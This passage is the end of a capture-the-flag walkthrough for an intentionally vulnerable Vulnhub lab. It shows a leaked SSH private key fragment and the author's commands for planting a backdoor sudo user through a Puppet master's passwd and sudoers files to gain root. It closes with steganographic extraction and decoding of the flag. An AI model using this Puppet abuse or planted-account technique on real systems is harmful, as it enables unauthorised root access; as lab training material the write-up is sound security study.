fKzUxX02Ejvo60xWJ8u6GIhUK404s2WVeG/PCLwtrKGjpyPCn3yCWpCWpGPuVNrx
Wg0Um581e4Vw5CLDL5hRLmo7wiqssuL3/Uugf/lc2vF+MxJyoI1F9Zkt2xvRYrLB
-----END RSA PRIVATE KEY-----

Now I have a key to ssh into the third machine: 192.168.122.3, so I change the permissions of the key to 600 and I use the key to ssh into the machine. Surprisingly, key asks for a passphrase. The second hint (malvin’s file) talks about the “Falken’s Maze” game. As I read on Wikipedia, There was a backdoor on this game, and the password was joshua. The same password is contained in the file my_world_you_are_persistent_try on the machine 192.168.122.2:

root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# chmod 600 nleeson_key
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# ssh nleeson@192.168.122.3 -i nleeson_key
Enter passphrase for key 'nleeson_key': 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

 System information disabled due to load higher than 1.0


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

nleeson@barringsbank:~$ 

I can’t find anything unusual on the system, so I modify the puppet manifest’s files to create a new user called anthony with password testpass and add it to the sudoers, so I can login as sudoer and see the shadow file to crack nleeson’s password hash.

I generate the password this way:

$ openssl passwd -1 -salt xyz testpass
$1$xyz$99Hw.JjOtHw5jCJCk0Uqs.

Then I modify the file /etc/puppet/modules/vulnhub/files/barringsbank-passwd adding a string on the bottom of the passwd file:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
nleeson:x:1000:1000:Nicholas Leeson,,,:/home/nleeson:/bin/bash
puppet:x:105:112:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
anthony:$1$xyz$99Hw.JjOtHw5jCJCk0Uqs.:1001:0:Anthony,,,:/home/anthony:/bin/bash

Then I modify the sudoers file on the path /etc/puppet/modules/vulnhub/files/sudoers:

root@puppet:/etc/puppet/modules/vulnhub/files# cat sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults	env_reset
Defaults	mail_badpass
Defaults	secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root	ALL=(ALL:ALL) ALL
anthony	ALL=(ALL:ALL) ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL

# Allow members of group sudo to execute any command
%sudo	ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d

And on the machine with the IP 192.168.122.3 I run the puppet agent to update the machine, login as anthony and become root:

nleeson@barringsbank:~$ puppet agent --server 192.168.122.2
nleeson@barringsbank:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
nleeson:x:1000:1000:Nicholas Leeson,,,:/home/nleeson:/bin/bash
puppet:x:105:112:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
anthony:$1$xyz$99Hw.JjOtHw5jCJCk0Uqs.:1001:0:Anthony,,,:/home/anthony:/bin/bash
nleeson@barringsbank:~$ su - anthony
Password: 
No directory, logging in with HOME=/
anthony@barringsbank:/$ sudo su
[sudo] password for anthony: 
root@barringsbank:/# id
uid=0(root) gid=0(root) groups=0(root)
root@barringsbank:/# 

So, I’m root.

I see this file me.jpeg. Since it’s the only file, I think it’s steganography.

After various attempts, I find out that the passphrase for getting the content is reticulatingsplines, from the file retrieved on the analoguepond machine.

$ steghide --info me.jpeg 
"me.jpeg":
  format: jpeg
  capacity: 11.9 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "primate_egyptian_flag.txt":
    size: 3.7 KB
    encrypted: rijndael-128, cbc
    compressed: yes

$ steghide extract -sf me.jpeg 
Enter passphrase: 
wrote extracted data to "primate_egyptian_flag.txt".
$ cat primate_egyptian_flag.txt
674143496741434967414349674143496741434967414349674143496741
69434b34694c7555336235426963765a47497a4e5859694269636c526d62
6c5a4749684279636e556d636c686b430a67414349674143496741434967
41434967414349674143496741434967414349674143494b386c4c743053
4c7538464967414349674143496734534c73414349674143496741434967
4143490a6741434967414349674143496741434967414349674143496741
43496741434967414349674143494b34435967414349674143496763794a
74347958663543586742434938424349674143490a663931586639315866
393158663931586639315875307a4b7273434c6741434967414349674143
4967416943634243496734434c6741795867414349674143496741795867
414358674143490a39305450393054503930545039305450393054503934
796276396d4c666843496741434967414349674143494b77484967414349
3878335838394666663931586639315838783358703831580a3842434967
414349674143496741434967414349674143496e346e6667414349674143
496741434967414349676f41666741434967774866397758503831545039
30545039774866393054500a677746496741434967414349674143496741
434967414349674143496741434967414349674143496741434967414349
4b384349673847497642794a2b424749674143496741794a2b4243490a67
636966674243496741434967414349674143496741434967414349674143
4967414349674143496741434967414349674143494b3843496738474976
4243496741434963426d66764143490a765a47496b355759673457616864
575967553259753947493139576567384764674d6e62766c476468785764
30466d636e353262447067434b41794a7434795866393158753043596741
43490a673847646751575a704a486467556d646e6b6b434b4153496e4647
626d7077637068476467636d62704a5864304258596a4269627642535a74
6c476467674764346c326367554761304269630a734233636852585a7442
7964764a486130425362764a6e5a676b5859334647496c5a336274427962
3042434c6c4a585a6f424364704a474968424363314279636e3557616f52
4849346c57620a3042435a6c6c33627135575a67556d6468684749313957
6567554763766847494a42694c7a646d627068476467515859674d486470
3947627768585a6749575a3342435a75466d43306c32620a774258596755
6d596751476231393264675133596c423363684279637068476467343262
67733259684a475a6c566d5a4b495864766c48496b355759673432627052
6e6376424849304647610a6a563263674d57613046576276525864684279
626b427962304243646c4e48496c4a5859674d58545742535a7a56476130
42434c6c5233627542695a507067437551575a304657616a566d630a674d
335a756c4761304243636c56326167384764675148616e563362674d5861
6f524849764e6e437351585a774258647742795a756c3263314279636c52
58596b425864676b4864704a58640a4331474d6b3557595342434c754e6a
5179314749765248497a746d6268684764676b6e6268316b434b34535a73
4233626c42484979396d5a6767325a31396d626c42795970315759756c48
5a0a354279617546476130424362686c32596c42336367456b434b346952
554e45497a6c47613042795a756c47647a564764674933626d4269657535
57613256326167516d62684269576c5258650a685a6e436c68476467516d
62684279636c646d626c78476268683259675532636c6847646777476268
42795a756c47647a394761674933626d427961786b576230427a5a673847
64675533620a68424364755632596c4a48497a6c4761674933626d426962
7a496d637442796230424364686847496c68476467593262674158613042
53516734535a6a6c6d646b4647496c786d59685648620a765a47496e3557
61723932627342535a7946474931395765675957616749585a3052586133
52484979394749444a565367343262675557624b5158614942694c6c4e6d
6268523363704e33630a30564762773132624442434c7539474976646b43
4b34535a6e35575a737857596f4e6d436c6847646751575a305647627731
32626a42535a324647616749336267516e6270684749684269630a7a526d
626c6c6d6347426963313945496d394749784d43496c5232627a6c47636c
42695a7642534e306f7a4e774179623042434d7a6f6a4e7741694f6c7832
59796c3259675547613042535a0a676f77507534694c7534326270523359
6c356d62764e47496c684764674d334a304647615842694c7555544f3545
4449444a6b51676b79516f414361304a33624f42535a6f526c43756c4549
0a6741434967414349674143496741434967414349674143496741434967
414349674143496741434967414349674143496741434967414349674143
49674143496741434967414349674143490a3d6f515a794657623068325a
70353253743043490a

This is a hexadecimal string, I decode it and I get the following outout:

gACIgACIgACIgACIgACIgACIgACIgAiCK4iLuU3b5BicvZGIzNXYiBiclRmblZGIhBycnUmclhkC
gACIgACIgACIgACIgACIgACIgACIgACIgACIK8lLt0SLu8FIgACIgACIg4SLsACIgACIgACIgACI
gACIgACIgACIgACIgACIgACIgACIgACIgACIgACIK4CYgACIgACIgcyJt4yXf5CXgBCI8BCIgACI
f91Xf91Xf91Xf91Xf91Xu0zKrsCLgACIgACIgACIgAiCcBCIg4CLgAyXgACIgACIgAyXgACXgACI
90TP90TP90TP90TP90TP94ybv9mLfhCIgACIgACIgACIKwHIgACI8x3X89Fff91Xf91X8x3Xp81X
8BCIgACIgACIgACIgACIgACIn4nfgACIgACIgACIgACIgoAfgACIgwHf9wXP81TP90TP9wHf90TP
gwFIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIK8CIg8GIvByJ+BGIgACIgAyJ+BCI
gcifgBCIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIK8CIg8GIvBCIgACIcBmfvACI
vZGIk5WYg4WahdWYgU2Yu9GI19Weg8GdgMnbvlGdhxWd0Fmcn52bDpgCKAyJt4yXf91Xu0CYgACI
g8GdgQWZpJHdgUmdnkkCKASInFGbmpwcphGdgcmbpJXd0BXYjBibvBSZtlGdggGd4l2cgUGa0Bic
sB3chRXZtBydvJHa0BSbvJnZgkXY3FGIlZ3btByb0BCLlJXZoBCdpJGIhBCc1Bycn5WaoRHI4lWb
0BCZll3bq5WZgUmdhhGI19WegUGcvhGIJBiLzdmbphGdgQXYgMHdp9GbwhXZgIWZ3BCZuFmC0l2b
wBXYgUmYgQGb192dgQ3YlB3chBycphGdg42bgs2YhJGZlVmZKIXdvlHIk5WYg42bpRncvBHI0FGa
jV2cgMWa0FWbvRXdhBybkByb0BCdlNHIlJXYgMXTWBSZzVGa0BCLlR3buBiZPpgCuQWZ0FWajVmc
gM3ZulGa0BCclV2ag8GdgQHanV3bgMXaoRHIvNnCsQXZwBXdwByZul2c1ByclRXYkBXdgkHdpJXd
C1GMk5WYSBCLuNjQy1GIvRHIztmbhhGdgknbh1kCK4SZsB3blBHIy9mZgg2Z19mblByYp1WYulHZ
5ByauFGa0BCbhl2YlB3cgEkCK4iRUNEIzlGa0ByZulGdzVGdgI3bmBieu5Wa2V2agQmbhBiWlRXe
hZnClhGdgQmbhBycldmblxGbhh2YgU2clhGdgwGbhByZulGdz9GagI3bmByaxkWb0BzZg8GdgU3b
hBCduV2YlJHIzlGagI3bmBibzImctByb0BCdhhGIlhGdgY2bgAXa0BSQg4SZjlmdkFGIlxmYhVHb
vZGIn5War92bsBSZyFGI19WegYWagIXZ0RXa3RHIy9GIDJVSg42bgUWbKQXaIBiLlNmbhR3cpN3c
0VGbw12bDBCLu9GIvdkCK4SZn5WZsxWYoNmClhGdgQWZ0VGbw12bjBSZ2FGagI3bgQnbphGIhBic
zRmbllmcGBic19EIm9GIxMCIlR2bzlGclBiZvBSN0ozNwAyb0BCMzojNwAiOlx2Yyl2YgUGa0BSZ
gowPu4iLu42bpR3Yl5mbvNGIlhGdgM3J0FGaXBiLuUTO5EDIDJkQgkyQoACa0J3bOBSZoRlCulEI
gACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACI
=oQZyFWb0h2Zp52St0CI

In here there’s the pattern gACI that blocks the conversion from base64 to chars, so I delete the pattern and I retrieve the following

gAiCK4iLuU3b5BicvZGIzNXYiBiclRmblZGIhBycnUmclhkC
K8lLt0SLu8FIg4SLsACI
K4CYgcyJt4yXf5CXgBCI8BCI
f91Xf91Xf91Xf91Xf91Xu0zKrsCLgAiCcBCIg4CLgAyXgAyXgACX
90TP90TP90TP90TP90TP94ybv9mLfhCIKwHI8x3X89Fff91Xf91X8x3Xp81X
8BCIn4nfgoAfgwHf9wXP81TP90TP9wHf90TP
gwFIK8CIg8GIvByJ+BGIgAyJ+BCI
gcifgBCIK8CIg8GIvBCIcBmfvACI
vZGIk5WYg4WahdWYgU2Yu9GI19Weg8GdgMnbvlGdhxWd0Fmcn52bDpgCKAyJt4yXf91Xu0CY
g8GdgQWZpJHdgUmdnkkCKASInFGbmpwcphGdgcmbpJXd0BXYjBibvBSZtlGdggGd4l2cgUGa0Bic
sB3chRXZtBydvJHa0BSbvJnZgkXY3FGIlZ3btByb0BCLlJXZoBCdpJGIhBCc1Bycn5WaoRHI4lWb
0BCZll3bq5WZgUmdhhGI19WegUGcvhGIJBiLzdmbphGdgQXYgMHdp9GbwhXZgIWZ3BCZuFmC0l2b
wBXYgUmYgQGb192dgQ3YlB3chBycphGdg42bgs2YhJGZlVmZKIXdvlHIk5WYg42bpRncvBHI0FGa
jV2cgMWa0FWbvRXdhBybkByb0BCdlNHIlJXYgMXTWBSZzVGa0BCLlR3buBiZPpgCuQWZ0FWajVmc
gM3ZulGa0BCclV2ag8GdgQHanV3bgMXaoRHIvNnCsQXZwBXdwByZul2c1ByclRXYkBXdgkHdpJXd
C1GMk5WYSBCLuNjQy1GIvRHIztmbhhGdgknbh1kCK4SZsB3blBHIy9mZgg2Z19mblByYp1WYulHZ
5ByauFGa0BCbhl2YlB3cgEkCK4iRUNEIzlGa0ByZulGdzVGdgI3bmBieu5Wa2V2agQmbhBiWlRXe
hZnClhGdgQmbhBycldmblxGbhh2YgU2clhGdgwGbhByZulGdz9GagI3bmByaxkWb0BzZg8GdgU3b
hBCduV2YlJHIzlGagI3bmBibzImctByb0BCdhhGIlhGdgY2bgAXa0BSQg4SZjlmdkFGIlxmYhVHb
vZGIn5War92bsBSZyFGI19WegYWagIXZ0RXa3RHIy9GIDJVSg42bgUWbKQXaIBiLlNmbhR3cpN3c
0VGbw12bDBCLu9GIvdkCK4SZn5WZsxWYoNmClhGdgQWZ0VGbw12bjBSZ2FGagI3bgQnbphGIhBic
zRmbllmcGBic19EIm9GIxMCIlR2bzlGclBiZvBSN0ozNwAyb0BCMzojNwAiOlx2Yyl2YgUGa0BSZ
gowPu4iLu42bpR3Yl5mbvNGIlhGdgM3J0FGaXBiLuUTO5EDIDJkQgkyQoACa0J3bOBSZoRlCulEI

=oQZyFWb0h2Zp52St0CI

At this point I reverse the strings, and this is what I get

CkhlcmUncyBhIGZlbmRlciBiYXNzIGZvciB5b3UuLi4KCiAg
ICAsLS4gIF8uLS0tLl8K
ICB8ICBgXC5fXy4tJycgYC4K
XCAgXyAgXyAgLC4gICBcCiAgLCsrKz0uX19fX19fX19fX19fX19f
X18pX3x8X19fX19ffF98X3x8IHwKIChfLm9vby49PT09PT09PT09PT09PT09
PT09fHw9PT09PT18PXw9fHwgfAogfn4nICB8
ICB+JyAgIGB+JyBvIG8gIC8KIFwg
ICAvfmBcICBvIG8gIC8KICBgficg
YC0uX19fXy4tJyAKCgpDb25ncmF0dWxhdGlvbnMgdG8geW91IG9uY2UgYWdhaW4gYW5kIGZv
ciB0aGUgc2l4dGggdGltZSBvbiBjYXB0dXJpbmcgdGhpcwpmbGFnISAKCkkndmUgdHJpZWQgdG8g
bWl4IHRoaW5ncyB1cCBhIGJpdCBoZXJlLCB0byBtb3ZlIGF3YXkgZnJvbSB0aHJvdyBtZXRhc3Bs
b2l0CmFuZCB3ZWIgZXhwbG9pdHMgYXQgdGhpbmdzLiBJIGhvcGUgeW91IGhhdmUgZW5qb3llZCB0
aGF0IHBvcnRpb24gYW5kIHlvdXIKZmVlZGJhY2sgb24gdGhpcyBhc3BlY3Qgd291bGQgYmUgYXBw
cmVjaWF0ZWQuCgpPZiBub3RlLCB0aGVzZSBWTXMgYXJlIHNldCB0byBkbyBhdXRvbWF0aWMgc2Vj
dXJpdHkgdXBkYXRlcyB1c2luZyBwdXBwZXQsCnNvIHRoaXMgb3VnaHQgdG8ga2VlcCB0aGluZ3Mg
ZHluYW1pYyBlbm91Z2ggZm9yIHBlb3BsZS4KCk1hbnkgdGhhbmtzIHRvIG1yQjNuLCBSYW5kMG1C
eXRlWiBhbmQga2V2aW5ueiBmb3IgdGVzdGluZyB0aGlzIENURi4KCkEgc3BlY2lhbCB0aGFuayB5
b3UgdG8gZzB0bWkxayBmb3IgaG9zdGluZyBhbGwgdGhlc2UgY2hhbGxlbmdlcyBhbmQgdGhlCnZh
bHVhYmxlIGFkdmljZS4gQSB0aXAgb2YgdGhlIGhhdCB0byBtcmIzbiBmb3IgaGlzIHJlY2VudCBh
c3Npc3RhbmNlLiBIaXQKbWUgb24gSVJDIG9yIHR3aXR0ZXIgaWYgeW91IGFyZSBsb29raW5nIGZv
ciBhIGhpbnQgb3IgaGF2ZSBjb21wbGV0ZWQgdGhlCmNoYWxsZW5nZS4KCkdvIG9uLCBDb21wbGV0
ZSB0aGUgY2lyY2xlOiAwNjozMCB0byAwNzo0NSBvZiBlcGlzb2RlICMxIG9mIE91ciBGcmllbmRz
IEluClRoZSBOb3J0aCAoQykgQkJDIDE5OTUuLiBXaGF0J3MgdGhlIGNvbm5lY3Rpb24uLi4uPwog

IC0tS25pZ2h0bWFyZQo=

And then I decode the string from base64 to char:

Here's a fender bass for you...

    ,-.  _.---._
  |  `\.__.-'' `.
\  _  _  ,.   \
  ,+++=._________________)_||______|_|_|| |
 (_.ooo.===================||======|=|=|| |
 ~~'  |  ~'   `~' o o  /
 \   /~`\  o o  /
  `~' `-.____.-' 


Congratulations to you once again and for the sixth time on capturing this
flag! 

I've tried to mix things up a bit here, to move away from throw metasploit
and web exploits at things. I hope you have enjoyed that portion and your
feedback on this aspect would be appreciated.

Of note, these VMs are set to do automatic security updates using puppet,
so this ought to keep things dynamic enough for people.

Many thanks to mrB3n, Rand0mByteZ and kevinnz for testing this CTF.

A special thank you to g0tmi1k for hosting all these challenges and the
valuable advice. A tip of the hat to mrb3n for his recent assistance. Hit
me on IRC or twitter if you are looking for a hint or have completed the
challenge.

Go on, Complete the circle: 06:30 to 07:45 of episode #1 of Our Friends In
The North (C) BBC 1995.. What's the connection....?
  --Knightmare

I really enjoyed the usage of Puppet in this VM, it’s been quite nice and it shows how much damage it could do if used wrongly.

Thank you to knightmare for the VM and Vulnhub for hosting it.